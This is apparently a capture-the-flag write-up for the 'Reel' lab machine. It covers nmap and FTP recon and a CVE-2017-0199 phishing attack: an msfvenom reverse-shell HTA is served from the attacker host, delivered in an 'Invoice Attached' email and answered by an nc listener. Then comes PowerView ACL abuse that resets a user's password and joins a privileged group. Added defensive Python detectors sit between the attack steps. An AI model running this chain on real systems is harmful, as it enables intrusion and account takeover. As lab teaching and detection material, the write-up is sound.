nmap -A -T4 10.10.10.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST
Nmap scan report for 10.10.10.77
Host is up (0.55s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
|_ 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=1/18%Time=63C79217%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (86%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 636.94 ms 10.10.16.1
2 637.07 ms 10.10.10.77
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.69 seconds
The target is a Windows Server 2012 host with FTP, SSH and SMTP exposed.
Try logging in to FTP and SSH.
Anonymous FTP login is allowed.
ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
226 Transfer complete.
ftp>
Information gathering
The following files were found and downloaded:
ftp> dir
229 Entering Extended Passive Mode (|||41007|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||41008|)
150 Opening ASCII mode data connection.
100% |*******************************| 124 0.19 KiB/s 00:00 ETA
226 Transfer complete.
124 bytes received in 00:00 (0.13 KiB/s)
ftp> get Windows\ Event\ Forwarding.docx
local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
229 Entering Extended Passive Mode (|||41010|)
150 Opening ASCII mode data connection.
100% |*******************************| 14581 14.21 KiB/s 00:00 ETAftp: Reading from network: Interrupted system call
0% | | -1 0.00 KiB/s --:-- ETA
226 Transfer complete.
WARNING! 51 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> dir
229 Entering Extended Passive Mode (|||41011|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get AppLocker.docx
local: AppLocker.docx remote: AppLocker.docx
229 Entering Extended Passive Mode (|||41012|)
150 Opening ASCII mode data connection.
100% |*******************************| 2047 2.27 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 9 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
2047 bytes received in 00:01 (1.70 KiB/s)
ftp> exit
221 Goodbye.
Use exiftool to view the metadata of "Windows Event Forwarding.docx"
Command: exiftool "Windows Event Forwarding.docx"
Output:
ExifTool Version Number : 12.49
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2023:01:18 01:58:38-05:00
File Access Date/Time : 2023:01:18 01:59:18-05:00
File Inode Change Date/Time : 2023:01:18 01:58:38-05:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
The metadata reveals the mailbox nico@megabank.com
Try phishing this mailbox to obtain a shell
CVE used:
CVE-2017-0199
Download:
https://github.com/bhdresh/CVE-2017-0199
Brief description:
CVE-2017-0199 is a logic flaw in how Microsoft Office handles OLE objects. When Word processes an embedded OLE2Link object and updates it over the network, it does not handle the Content-Type correctly. Because it is a logic flaw rather than memory corruption, exploiting it does not require bypassing mitigations such as ASLR and DEP, so the success rate is very high.
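As an added, defender-side example (not code from the writeup or from the CVE-2017-0199 toolkit), the following Python scanner looks for the delivery pattern just described in an RTF file: an embedded object carrying the \objautlink / \objupdate control words, an \objdata blob whose decoded hex contains the OLE2Link class name, and a remote URL stored inside it as UTF-16LE. The sample RTF is constructed inline with a placeholder URL and contains no real OLE stream, so it exercises the detector without being a working document.

```python
"""Flag RTF files that embed an auto-updating OLE link object pointing at a URL.
Constructed detection example; not the writeup's code."""
import re

# Hex body of every {\*\objdata ...} group (RTF stores embedded objects as hex text).
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# Control words that mark an object Word will try to refresh on open.
CONTROL_WORDS = (b"\\objautlink", b"\\objupdate", b"\\objdata")
# Runs of at least six printable UTF-16LE characters inside a binary blob.
UTF16_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def decode_objdata(rtf: bytes) -> list:
    """Return the binary payload of each \\objdata group."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]            # tolerate a dangling nibble
        try:
            blobs.append(bytes.fromhex(hexstr.decode("ascii")))
        except ValueError:
            continue                        # malformed hex: skip, do not crash
    return blobs


def scan_rtf(rtf: bytes) -> dict:
    """Classify an RTF as clean / suspicious-embedded-object / ole2link-remote-object."""
    result = {"is_rtf": rtf.lstrip().startswith(b"{\\rt"), "control_words": [],
              "ole2link": False, "remote_urls": [], "verdict": "clean"}
    if not result["is_rtf"]:
        result["verdict"] = "not-rtf"
        return result
    result["control_words"] = [cw.decode("ascii") for cw in CONTROL_WORDS if cw in rtf]
    for blob in decode_objdata(rtf):
        if b"OLE2Link" in blob:              # class name the link object advertises
            result["ole2link"] = True
        for run in UTF16_RUN_RE.finditer(blob):
            text = run.group(0).decode("utf-16-le")
            idx = text.find("http")
            if idx >= 0:
                result["remote_urls"].append(text[idx:])
    if result["ole2link"] and result["remote_urls"]:
        result["verdict"] = "ole2link-remote-object"
    elif b"\\objautlink" in rtf or result["remote_urls"]:
        result["verdict"] = "suspicious-embedded-object"
    return result


def build_sample_rtf() -> bytes:
    """Constructed RTF carrying the indicator pattern; it embeds no real OLE stream."""
    fake_objdata = (
        b"\x01\x05\x00\x00\x02\x00\x00\x00"                  # constructed filler bytes
        + b"OLE2Link\x00\x00"                                  # class-name indicator
        + "http://example.invalid/doc.hta".encode("utf-16-le")  # placeholder URL
        + b"\x00\x00"
    )
    return (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw1\\objh1{\\*\\objdata "
            + fake_objdata.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    print(scan_rtf(build_sample_rtf()))
    print(scan_rtf(b"{\\rtf1\\ansi Hello, world}"))
```

In a mail gateway the same logic runs over attachments before delivery; the OLE2Link string plus an embedded URL is the high-confidence signal, while \objautlink alone only earns a closer look.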
Generate the shell payload with msfvenom
Command:
msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.13 lport=6666 -f hta-psh -o shell.hta
Start an HTTP server with Python to serve the remote file
Command:
python3 -m http.server 80
Generate the RTF payload document
Command:
python2 cve-2017-0199_toolkit.py -M gen -w hi.rtf -u http://10.10.16.13/shell.hta -t rtf -x 0
Start nc to receive the reverse shell
Command:
nc -nvlp 6666
Send the payload file to the target mailbox with sendEmail
Command:
sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a hi.rtf -s 10.10.10.77 -v
Output:
Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => Connecting to 10.10.10.77:25
Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => My IP address is: 10.10.16.13
Jan 18 03:59:55 kali sendEmail[40007]: SUCCESS => Received: 220 Mail Service ready
Jan 18 03:59:55 kali sendEmail[40007]: INFO => Sending: EHLO kali
Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending: MAIL FROM:<mac@megabank.com>
Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received: 250 OK
Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending: RCPT TO:<nico@megabank.com>
Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received: 250 OK
Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending: DATA
Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received: 354 OK, send.
Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending message body
Jan 18 03:59:57 kali sendEmail[40007]: Setting content-type: text/plain
Jan 18 03:59:57 kali sendEmail[40007]: DEBUG => Sending the attachment [hi.rtf]
Jan 18 04:00:09 kali sendEmail[40007]: SUCCESS => Received: 250 Queued (12.156 seconds)
Jan 18 04:00:09 kali sendEmail[40007]: Email was sent successfully! From: <mac@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [hi.rtf] Server: [10.10.10.77:25]
After a while, nc receives a shell.
The Python HTTP server is accessed:
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.77 - - [18/Jan/2023 04:00:25] "GET /shell.hta HTTP/1.1" 200 -
10.10.10.77 - - [18/Jan/2023 04:00:26] "GET /shell.hta HTTP/1.1" 200 -
nc receives the shell:
nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.16.13] from (UNKNOWN) [10.10.10.77] 60488
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Get the user flag
C:\Users\nico\Desktop>type user.txt
Use msf instead of nc to get a shell
msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf > set lhost 10.10.14.17
msf > set lport 4444
msf > set srvhost 10.10.14.17
msf > run
sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v
The following key information was found:
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed FALSE
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed FALSE
tom@HTB.LOCAL has WriteOwner on the claire@HTB.LOCAL account, and claire@HTB.LOCAL has WriteDacl on Backup_Admins@HTB.LOCAL.
Privilege escalation
Use PowerView to abuse these permissions
Download: https://github.com/PowerShellMafia/PowerSploit
Directory: PowerSploit-master\PowerSploit-master\Recon
Usage:
. .\PowerView.ps1    # dot-source PowerView into the session
Set the current user tom as the owner of claire's ACL and grant him the right to reset her password
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
Set claire's password to Ab345678123!@#
$cred = ConvertTo-SecureString "Ab345678123!@#" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred
Log in over SSH
ssh claire@10.129.5.10
Listing the backup_admins group shows only the user ranj
net group backup_admins
Add claire to the backup_admins group, then log in again
net group backup_admins claire /add
net group backup_admins
Going through the passwords in the Backup Scripts directory turns up the administrator password Cr4ckMeIfYouC4n!, which gives SYSTEM privileges.
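As an added, defender-side example (not part of the writeup), the following Python snippet shows how the escalation chain above appears in the Windows Security log and how to correlate it: Set-DomainObjectOwner and Add-DomainObjectAcl rewrite claire's nTSecurityDescriptor (event 5136, which only appears when object-level auditing is enabled on the directory), Set-DomainUserPassword produces a password-reset event (4724), and net group ... /add produces a member-added event (4728 for a global group). The event records are constructed and simplified; the field names follow the Security log's data names, and the privileged-group list and allowlist are assumptions for the example.

```python
"""Correlate Windows Security events into the ACL-abuse chain shown above.
Constructed example; the event records are simplified and not from the writeup."""
from collections import defaultdict

# Assumed for this example: groups whose membership changes always warrant review,
# and service accounts that legitimately rewrite security descriptors.
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators", "backup_admins"}
ACL_ADMIN_ALLOWLIST = {"svc_adsync"}

# Constructed events, in the order the chain above would produce them.
EVENTS = [
    {"EventID": 4624, "SubjectUserName": "tom", "LogonType": 3},           # plain logon
    {"EventID": 5136, "SubjectUserName": "tom",                            # Set-DomainObjectOwner
     "ObjectDN": "CN=claire,CN=Users,DC=htb,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "SubjectUserName": "tom",                            # Add-DomainObjectAcl
     "ObjectDN": "CN=claire,CN=Users,DC=htb,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4724, "SubjectUserName": "tom", "TargetUserName": "claire"},  # password reset
    {"EventID": 4728, "SubjectUserName": "claire", "TargetUserName": "Backup_Admins",
     "MemberName": "CN=claire,CN=Users,DC=htb,DC=local"},                  # net group ... /add
    {"EventID": 4728, "SubjectUserName": "helpdesk", "TargetUserName": "VPN Users",
     "MemberName": "CN=newhire,CN=Users,DC=htb,DC=local"},                 # routine, not flagged
]


def cn_of(dn: str) -> str:
    """Return the leading RDN value: 'CN=claire,CN=Users,DC=htb,DC=local' -> 'claire'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def detect_acl_abuse(events) -> list:
    """Return (rule, subject, target) tuples in event order."""
    findings = []
    acl_touched = defaultdict(set)   # subject -> accounts whose owner/DACL they rewrote
    for ev in events:
        eid = ev.get("EventID")
        subject = ev.get("SubjectUserName", "").lower()
        if subject in ACL_ADMIN_ALLOWLIST:
            continue
        if (eid == 5136 and ev.get("ObjectClass") == "user"
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            target = cn_of(ev.get("ObjectDN", "")).lower()
            # One finding per (subject, target): owner change and ACE add both land here.
            if target != subject and target not in acl_touched[subject]:
                acl_touched[subject].add(target)
                findings.append(("security_descriptor_changed", subject, target))
        elif eid == 4724:
            target = ev.get("TargetUserName", "").lower()
            # A reset by someone who just rewrote that account's ACL is the abuse pattern.
            if target in acl_touched[subject]:
                findings.append(("reset_after_acl_change", subject, target))
        elif eid in (4728, 4732, 4756):          # global / local / universal group add
            group = ev.get("TargetUserName", "").lower()
            member = cn_of(ev.get("MemberName", "")).lower()
            if group in PRIVILEGED_GROUPS:
                rule = ("self_added_to_privileged_group" if member == subject
                        else "privileged_group_member_added")
                findings.append((rule, subject, group))
    return findings


if __name__ == "__main__":
    for finding in detect_acl_abuse(EVENTS):
        print(*finding)
```

The correlation key is the subject account: a low-privileged user rewriting another user's security descriptor, then resetting that user's password, then that user adding itself to a privileged group is three separate events that only look benign in isolation.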